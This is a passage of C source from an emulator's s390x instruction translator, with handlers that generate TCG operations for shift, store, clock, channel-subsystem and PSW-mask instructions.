o->out, o->out2, o->in1, o->in2); return_low128(tcg_ctx, o->out2); return DISAS_NEXT; } static DisasJumpType op_sqeb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_sqeb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2); return DISAS_NEXT; } static DisasJumpType op_sqdb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_sqdb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2); return DISAS_NEXT; } static DisasJumpType op_sqxb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_sqxb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2); return_low128(tcg_ctx, o->out2); return DISAS_NEXT; } static DisasJumpType op_servc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_servc(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->in2, o->in1); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_sigp(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 r3 = tcg_const_i32(tcg_ctx, get_field(s, r3)); gen_helper_sigp(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->in2, r1, r3); set_cc_static(s); tcg_temp_free_i32(tcg_ctx, r1); tcg_temp_free_i32(tcg_ctx, r3); return DISAS_NEXT; } static DisasJumpType op_soc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; DisasCompare c; TCGv_i64 a, h; TCGLabel *lab; int r1; disas_jcc(s, &c, get_field(s, m3)); /* We want to store when the condition is fulfilled, so branch out when it's not */ c.cond = tcg_invert_cond(c.cond); lab = gen_new_label(tcg_ctx); if (c.is_64) { tcg_gen_brcond_i64(tcg_ctx, c.cond, c.u.s64.a, c.u.s64.b, lab); } else { tcg_gen_brcond_i32(tcg_ctx, c.cond, c.u.s32.a, c.u.s32.b, lab); } free_compare(tcg_ctx, &c); r1 = get_field(s, r1); a = get_address(s, 0, get_field(s, b2), get_field(s, d2)); switch (s->insn->data) { case 1: /* STOCG */ tcg_gen_qemu_st64(tcg_ctx, tcg_ctx->regs[r1], a, get_mem_index(s)); break; case 0: /* STOC */ tcg_gen_qemu_st32(tcg_ctx, tcg_ctx->regs[r1], a, get_mem_index(s)); break; case 2: /* STOCFH */ h = tcg_temp_new_i64(tcg_ctx); tcg_gen_shri_i64(tcg_ctx, h, tcg_ctx->regs[r1], 32); tcg_gen_qemu_st32(tcg_ctx, h, a, get_mem_index(s)); tcg_temp_free_i64(tcg_ctx, h); break; default: // g_assert_not_reached(); break; } tcg_temp_free_i64(tcg_ctx, a); gen_set_label(tcg_ctx, lab); return DISAS_NEXT; } static DisasJumpType op_sla(DisasContext *s, DisasOps *o) { TCGv_i64 t; TCGContext *tcg_ctx = s->uc->tcg_ctx; uint64_t sign = 1ull << s->insn->data; if (s->insn->data == 31) { t = tcg_temp_new_i64(tcg_ctx); tcg_gen_shli_i64(tcg_ctx, t, o->in1, 32); } else { t = o->in1; } gen_op_update2_cc_i64(s, CC_OP_SLA, t, o->in2); if (s->insn->data == 31) { 
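/* Release the 32-bit widened copy; CC was already computed from it above. */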
tcg_temp_free_i64(tcg_ctx, t); } tcg_gen_shl_i64(tcg_ctx, o->out, o->in1, o->in2); /* The arithmetic left shift is curious in that it does not affect the sign bit. Copy that over from the source unchanged. */ tcg_gen_andi_i64(tcg_ctx, o->out, o->out, ~sign); tcg_gen_andi_i64(tcg_ctx, o->in1, o->in1, sign); tcg_gen_or_i64(tcg_ctx, o->out, o->out, o->in1); return DISAS_NEXT; } static DisasJumpType op_sll(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_shl_i64(tcg_ctx, o->out, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_sra(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_sar_i64(tcg_ctx, o->out, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_srl(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_shr_i64(tcg_ctx, o->out, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_sfpc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_sfpc(tcg_ctx, tcg_ctx->cpu_env, o->in2); return DISAS_NEXT; } static DisasJumpType op_sfas(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_sfas(tcg_ctx, tcg_ctx->cpu_env, o->in2); return DISAS_NEXT; } static DisasJumpType op_srnm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* Bits other than 62 and 63 are ignored. Bit 29 is set to zero. */ tcg_gen_andi_i64(tcg_ctx, o->addr1, o->addr1, 0x3ull); gen_helper_srnm(tcg_ctx, tcg_ctx->cpu_env, o->addr1); return DISAS_NEXT; } static DisasJumpType op_srnmb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* Bits 0-55 are ignored. */ tcg_gen_andi_i64(tcg_ctx, o->addr1, o->addr1, 0xffull); gen_helper_srnm(tcg_ctx, tcg_ctx->cpu_env, o->addr1); return DISAS_NEXT; } static DisasJumpType op_srnmt(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); /* Bits other than 61-63 are ignored.
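The low three bits select the DFP rounding mode and are deposited straight into the FPC below.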
*/ tcg_gen_andi_i64(tcg_ctx, o->addr1, o->addr1, 0x7ull); /* No need to call a helper, we don't implement dfp */ tcg_gen_ld32u_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUS390XState, fpc)); tcg_gen_deposit_i64(tcg_ctx, tmp, tmp, o->addr1, 4, 3); tcg_gen_st32_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUS390XState, fpc)); tcg_temp_free_i64(tcg_ctx, tmp); return DISAS_NEXT; } static DisasJumpType op_spm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_extrl_i64_i32(tcg_ctx, tcg_ctx->cc_op, o->in1); tcg_gen_extract_i32(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cc_op, 28, 2); set_cc_static(s); tcg_gen_shri_i64(tcg_ctx, o->in1, o->in1, 24); tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->psw_mask, tcg_ctx->psw_mask, o->in1, PSW_SHIFT_MASK_PM, 4); return DISAS_NEXT; } static DisasJumpType op_ectg(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int b1 = get_field(s, b1); int d1 = get_field(s, d1); int b2 = get_field(s, b2); int d2 = get_field(s, d2); int r3 = get_field(s, r3); TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); /* fetch all operands first */ o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_addi_i64(tcg_ctx, o->in1, tcg_ctx->regs[b1], d1); o->in2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_addi_i64(tcg_ctx, o->in2, tcg_ctx->regs[b2], d2); o->addr1 = get_address(s, 0, r3, 0); /* load the third operand into r3 before modifying anything */ tcg_gen_qemu_ld64(tcg_ctx, tcg_ctx->regs[r3], o->addr1, get_mem_index(s)); /* subtract CPU timer from first operand and store in GR0 */ gen_helper_stpt(tcg_ctx, tmp, tcg_ctx->cpu_env); tcg_gen_sub_i64(tcg_ctx, tcg_ctx->regs[0], o->in1, tmp); /* store second operand in GR1 */ tcg_gen_mov_i64(tcg_ctx, tcg_ctx->regs[1], o->in2); tcg_temp_free_i64(tcg_ctx, tmp); return DISAS_NEXT; } static DisasJumpType op_spka(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_shri_i64(tcg_ctx, o->in2, o->in2, 4); tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->psw_mask, tcg_ctx->psw_mask, o->in2, PSW_SHIFT_KEY, 4); return DISAS_NEXT; } static DisasJumpType op_sske(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_sske(tcg_ctx, tcg_ctx->cpu_env, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_ssm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->psw_mask, tcg_ctx->psw_mask, o->in2, 56, 8); /* Exit to main loop to reevaluate s390_cpu_exec_interrupt. */ return DISAS_PC_STALE_NOCHAIN; } static DisasJumpType op_stap(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_ld32u_i64(tcg_ctx, o->out, tcg_ctx->cpu_env, offsetof(CPUS390XState, core_id)); return DISAS_NEXT; } static DisasJumpType op_stck(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_stck(tcg_ctx, o->out, tcg_ctx->cpu_env); /* ??? We don't implement clock states. */ gen_op_movi_cc(s, 0); return DISAS_NEXT; } static DisasJumpType op_stcke(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 c1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 c2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 todpr = tcg_temp_new_i64(tcg_ctx); gen_helper_stck(tcg_ctx, c1, tcg_ctx->cpu_env); /* 16 bit value stored in a uint32_t (only valid bits set) */ tcg_gen_ld32u_i64(tcg_ctx, todpr, tcg_ctx->cpu_env, offsetof(CPUS390XState, todpr)); /* Shift the 64-bit value into its place as a zero-extended 104-bit value.
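That is, the first doubleword stored holds a zero epoch byte followed by the top 56 TOD bits, and the second holds the remaining TOD byte, a nonzero marker and the TOD programmable field.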
Note that "bit positions 64-103 are always non-zero so that they compare differently to STCK"; we set the least significant bit to 1. */ tcg_gen_shli_i64(tcg_ctx, c2, c1, 56); tcg_gen_shri_i64(tcg_ctx, c1, c1, 8); tcg_gen_ori_i64(tcg_ctx, c2, c2, 0x10000); tcg_gen_or_i64(tcg_ctx, c2, c2, todpr); tcg_gen_qemu_st64(tcg_ctx, c1, o->in2, get_mem_index(s)); tcg_gen_addi_i64(tcg_ctx, o->in2, o->in2, 8); tcg_gen_qemu_st64(tcg_ctx, c2, o->in2, get_mem_index(s)); tcg_temp_free_i64(tcg_ctx, c1); tcg_temp_free_i64(tcg_ctx, c2); tcg_temp_free_i64(tcg_ctx, todpr); /* ??? We don't implement clock states. */ gen_op_movi_cc(s, 0); return DISAS_NEXT; } static DisasJumpType op_sck(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_ld_i64(tcg_ctx, o->in1, o->addr1, get_mem_index(s), MO_TEQ | MO_ALIGN); gen_helper_sck(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->in1); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_sckc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_sckc(tcg_ctx, tcg_ctx->cpu_env, o->in2); return DISAS_NEXT; } static DisasJumpType op_sckpf(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_sckpf(tcg_ctx, tcg_ctx->cpu_env, tcg_ctx->regs[0]); return DISAS_NEXT; } static DisasJumpType op_stckc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_stckc(tcg_ctx, o->out, tcg_ctx->cpu_env); return DISAS_NEXT; } static DisasJumpType op_stctg(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 r3 = tcg_const_i32(tcg_ctx, get_field(s, r3)); gen_helper_stctg(tcg_ctx, tcg_ctx->cpu_env, r1, o->in2, r3); tcg_temp_free_i32(tcg_ctx, r1); tcg_temp_free_i32(tcg_ctx, r3); return DISAS_NEXT; } static DisasJumpType op_stctl(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 r3 = tcg_const_i32(tcg_ctx, get_field(s, r3)); gen_helper_stctl(tcg_ctx, tcg_ctx->cpu_env, r1, o->in2, r3); tcg_temp_free_i32(tcg_ctx, r1); tcg_temp_free_i32(tcg_ctx, r3); return DISAS_NEXT; } static DisasJumpType op_stidp(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_ld_i64(tcg_ctx, o->out, tcg_ctx->cpu_env, offsetof(CPUS390XState, cpuid)); return DISAS_NEXT; } static DisasJumpType op_spt(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_spt(tcg_ctx, tcg_ctx->cpu_env, o->in2); return DISAS_NEXT; } static DisasJumpType op_stfl(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_stfl(tcg_ctx, tcg_ctx->cpu_env); return DISAS_NEXT; } static DisasJumpType op_stpt(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_stpt(tcg_ctx, o->out, tcg_ctx->cpu_env); return DISAS_NEXT; } static DisasJumpType op_stsi(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_stsi(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->in2, tcg_ctx->regs[0], tcg_ctx->regs[1]); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_spx(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_spx(tcg_ctx, tcg_ctx->cpu_env, o->in2); return DISAS_NEXT; } static DisasJumpType op_xsch(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_xsch(tcg_ctx, tcg_ctx->cpu_env, tcg_ctx->regs[1]); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_csch(DisasContext *s, 
DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_csch(tcg_ctx, tcg_ctx->cpu_env, tcg_ctx->regs[1]); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_hsch(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_hsch(tcg_ctx, tcg_ctx->cpu_env, tcg_ctx->regs[1]); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_msch(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_msch(tcg_ctx, tcg_ctx->cpu_env, tcg_ctx->regs[1], o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_rchp(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_rchp(tcg_ctx, tcg_ctx->cpu_env, tcg_ctx->regs[1]); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_rsch(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_rsch(tcg_ctx, tcg_ctx->cpu_env, tcg_ctx->regs[1]); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_sal(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_sal(tcg_ctx, tcg_ctx->cpu_env, tcg_ctx->regs[1]); return DISAS_NEXT; } static DisasJumpType op_schm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_schm(tcg_ctx, tcg_ctx->cpu_env, tcg_ctx->regs[1], tcg_ctx->regs[2], o->in2); return DISAS_NEXT; } static DisasJumpType op_siga(DisasContext *s, DisasOps *o) { /* From KVM code: Not provided, set CC = 3 for subchannel not operational */ gen_op_movi_cc(s, 3); return DISAS_NEXT; } static DisasJumpType op_stcps(DisasContext *s, DisasOps *o) { /* The instruction is suppressed if not provided. */ return DISAS_NEXT; } static DisasJumpType op_ssch(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_ssch(tcg_ctx, tcg_ctx->cpu_env, tcg_ctx->regs[1], o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_stsch(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_stsch(tcg_ctx, tcg_ctx->cpu_env, tcg_ctx->regs[1], o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_stcrw(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_stcrw(tcg_ctx, tcg_ctx->cpu_env, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_tpi(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_tpi(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->addr1); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_tsch(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_tsch(tcg_ctx, tcg_ctx->cpu_env, tcg_ctx->regs[1], o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_chsc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_chsc(tcg_ctx, tcg_ctx->cpu_env, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_stpx(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_ld_i64(tcg_ctx, o->out, tcg_ctx->cpu_env, offsetof(CPUS390XState, psa)); tcg_gen_andi_i64(tcg_ctx, o->out, o->out, 0x7fffe000); return DISAS_NEXT; } static DisasJumpType op_stnosm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint64_t i2 = get_field(s, i2); TCGv_i64 t; /* It is important to do what the instruction name says: STORE THEN. If we let the output hook perform the store then if we fault and restart, we'll have the wrong SYSTEM MASK in place. 
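STNSM (opcode 0xac) then ANDs the immediate into the high byte of the PSW mask, while STOSM ORs it in; the opcode test below selects between the two.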
*/ t = tcg_temp_new_i64(tcg_ctx); tcg_gen_shri_i64(tcg_ctx, t, tcg_ctx->psw_mask, 56); tcg_gen_qemu_st8(tcg_ctx, t, o->addr1, get_mem_index(s)); tcg_temp_free_i64(tcg_ctx, t); if (s->fields.op == 0xac) { tcg_gen_andi_i64(tcg_ctx, tcg_ctx->psw_mask, tcg_ctx->psw_mask, (i2 << 56) | 0x00ffffffffffffffull); } else { tcg_gen_ori_i64(tcg_ctx, tcg_ctx->psw_mask, tcg_ctx->psw_mask, i2 << 56); } /* Exit to main loop to reevaluate s390_cpu_exec_interrupt. */ return DISAS_PC_STALE_NOCHAIN; } static DisasJumpType op_stura(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->addr1 = get_address(s, 0, get_field(s, r2), 0); tcg_gen_qemu_st_tl(tcg_ctx, o->in1, o->addr1, MMU_REAL_IDX, s->insn->data); if (s->base.tb->flags & FLAG_MASK_PER) { update_psw_addr(s); gen_helper_per_store_real(tcg_ctx, tcg_ctx->cpu_env); } return DISAS_NEXT; } static DisasJumpType op_stfle(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_stfle(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_st8(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_st8(tcg_ctx, o->in1, o->in2, get_mem_index(s)); return DISAS_NEXT; } static DisasJumpType op_st16(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_st16(tcg_ctx, o->in1, o->in2, get_mem_index(s)); return DISAS_NEXT; } static DisasJumpType op_st32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_st32(tcg_ctx, o->in1, o->in2, get_mem_index(s)); return DISAS_NEXT; } static DisasJumpType op_st64(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_st64(tcg_ctx, o->in1, o->in2, get_mem_index(s)); return DISAS_NEXT; } static DisasJumpType op_stam(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 r3 = tcg_const_i32(tcg_ctx, get_field(s, r3)); gen_helper_stam(tcg_ctx, tcg_ctx->cpu_env, r1, o->in2, r3); tcg_temp_free_i32(tcg_ctx, r1); tcg_temp_free_i32(tcg_ctx, r3); return DISAS_NEXT; } static DisasJumpType op_stcm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int m3 = get_field(s, m3); int pos, base = s->insn->data; TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); pos = base + ctz32(m3) * 8; switch (m3) { case 0xf: /* Effectively a 32-bit store. */ tcg_gen_shri_i64(tcg_ctx, tmp, o->in1, pos); tcg_gen_qemu_st32(tcg_ctx, tmp, o->in2, get_mem_index(s)); break; case 0xc: case 0x6: case 0x3: /* Effectively a 16-bit store. */ tcg_gen_shri_i64(tcg_ctx, tmp, o->in1, pos); tcg_gen_qemu_st16(tcg_ctx, tmp, o->in2, get_mem_index(s)); break; case 0x8: case 0x4: case 0x2: case 0x1: /* Effectively an 8-bit store. */ tcg_gen_shri_i64(tcg_ctx, tmp, o->in1, pos); tcg_gen_qemu_st8(tcg_ctx, tmp, o->in2, get_mem_index(s)); break; default: /* This is going to be a sequence of shifts and stores. 
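Each set mask bit, scanned from the most significant of the four, stores one byte and advances the address by one.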
*/ pos = base + 32 - 8; while (m3) { if (m3 & 0x8) { tcg_gen_shri_i64(tcg_ctx, tmp, o->in1, pos); tcg_gen_qemu_st8(tcg_ctx, tmp, o->in2, get_mem_index(s)); tcg_gen_addi_i64(tcg_ctx, o->in2, o->in2, 1); } m3 = (m3 << 1) & 0xf; pos -= 8; } break; } tcg_temp_free_i64(tcg_ctx, tmp); return DISAS_NEXT; } static DisasJumpType op_stm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); int r3 = get_field(s, r3); int size = s->insn->data; TCGv_i64 tsize = tcg_const_i64(tcg_ctx, size); while (1) { if (size == 8) { tcg_gen_qemu_st64(tcg_ctx, tcg_ctx->regs[r1], o->in2, get_mem_index(s)); } else { tcg_gen_qemu_st32(tcg_ctx, tcg_ctx->regs[r1], o->in2, get_mem_index(s)); } if (r1 == r3) { break; } tcg_gen_add_i64(tcg_ctx, o->in2, o->in2, tsize); r1 = (r1 + 1) & 15; } tcg_temp_free_i64(tcg_ctx, tsize); return DISAS_NEXT; } static DisasJumpType op_stmh(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); int r3 = get_field(s, r3); TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t4 = tcg_const_i64(tcg_ctx, 4); TCGv_i64 t32 = tcg_const_i64(tcg_ctx, 32); while (1) { tcg_gen_shl_i64(tcg_ctx, t, tcg_ctx->regs[r1], t32); tcg_gen_qemu_st32(tcg_ctx, t, o->in2, get_mem_index(s)); if (r1 == r3) { break; } tcg_gen_add_i64(tcg_ctx, o->in2, o->in2, t4); r1 = (r1 + 1) & 15; } tcg_temp_free_i64(tcg_ctx, t); tcg_temp_free_i64(tcg_ctx, t4); tcg_temp_free_i64(tcg_ctx, t32); return DISAS_NEXT; } static DisasJumpType op_stpq(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!(tb_cflags(s->base.tb) & CF_PARALLEL)) { gen_helper_stpq(tcg_ctx, tcg_ctx->cpu_env, o->in2, o->out2, o->out); } else if (HAVE_ATOMIC128) { gen_helper_stpq_parallel(tcg_ctx, tcg_ctx->cpu_env, o->in2, o->out2, o->out); } else { gen_helper_exit_atomic(tcg_ctx, tcg_ctx->cpu_env); return DISAS_NORETURN; } return DISAS_NEXT; } static DisasJumpType op_srst(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 r2 = tcg_const_i32(tcg_ctx, get_field(s, r2)); gen_helper_srst(tcg_ctx, tcg_ctx->cpu_env, r1, r2); tcg_temp_free_i32(tcg_ctx, r1); tcg_temp_free_i32(tcg_ctx, r2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_srstu(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 r2 = tcg_const_i32(tcg_ctx, get_field(s, r2)); gen_helper_srstu(tcg_ctx, tcg_ctx->cpu_env, r1, r2); tcg_temp_free_i32(tcg_ctx, r1); tcg_temp_free_i32(tcg_ctx, r2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_sub(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_sub_i64(tcg_ctx, o->out, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_subb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; DisasCompare cmp; TCGv_i64 borrow; tcg_gen_sub_i64(tcg_ctx, o->out, o->in1, o->in2); /* The !borrow flag is the msb of CC. Since we want the inverse of that, we ask for a comparison of CC=0 | CC=1 -> mask of 8 | 4. 
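The setcond below then yields 1 exactly when a borrow occurred, so subtracting it folds the borrow into the difference.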
*/ disas_jcc(s, &cmp, 8 | 4); borrow = tcg_temp_new_i64(tcg_ctx); if (cmp.is_64) { tcg_gen_setcond_i64(tcg_ctx, cmp.cond, borrow, cmp.u.s64.a, cmp.u.s64.b); } else { TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_setcond_i32(tcg_ctx, cmp.cond, t, cmp.u.s32.a, cmp.u.s32.b); tcg_gen_extu_i32_i64(tcg_ctx, borrow, t); tcg_temp_free_i32(tcg_ctx, t); } free_compare(tcg_ctx, &cmp); tcg_gen_sub_i64(tcg_ctx, o->out, o->out, borrow); tcg_temp_free_i64(tcg_ctx, borrow); return DISAS_NEXT; } static DisasJumpType op_svc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t; update_psw_addr(s); update_cc_op(s); t = tcg_const_i32(tcg_ctx, get_field(s, i1) & 0xff); tcg_gen_st_i32(tcg_ctx, t, tcg_ctx->cpu_env, offsetof(CPUS390XState, int_svc_code)); tcg_temp_free_i32(tcg_ctx, t); t = tcg_const_i32(tcg_ctx, s->ilen); tcg_gen_st_i32(tcg_ctx, t, tcg_ctx->cpu_env, offsetof(CPUS390XState, int_svc_ilen)); tcg_temp_free_i32(tcg_ctx, t); gen_exception(tcg_ctx, EXCP_SVC); return DISAS_NORETURN; } static DisasJumpType op_tam(DisasContext *s, DisasOps *o) { int cc = 0; cc |= (s->base.tb->flags & FLAG_MASK_64) ? 2 : 0; cc |= (s->base.tb->flags & FLAG_MASK_32) ? 1 : 0; gen_op_movi_cc(s, cc); return DISAS_NEXT; } static DisasJumpType op_tceb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_tceb(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->in1, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_tcdb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_tcdb(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->in1, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_tcxb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_tcxb(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->out, o->out2, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_testblock(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_testblock(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_tprot(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_tprot(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->addr1, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_tp(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; 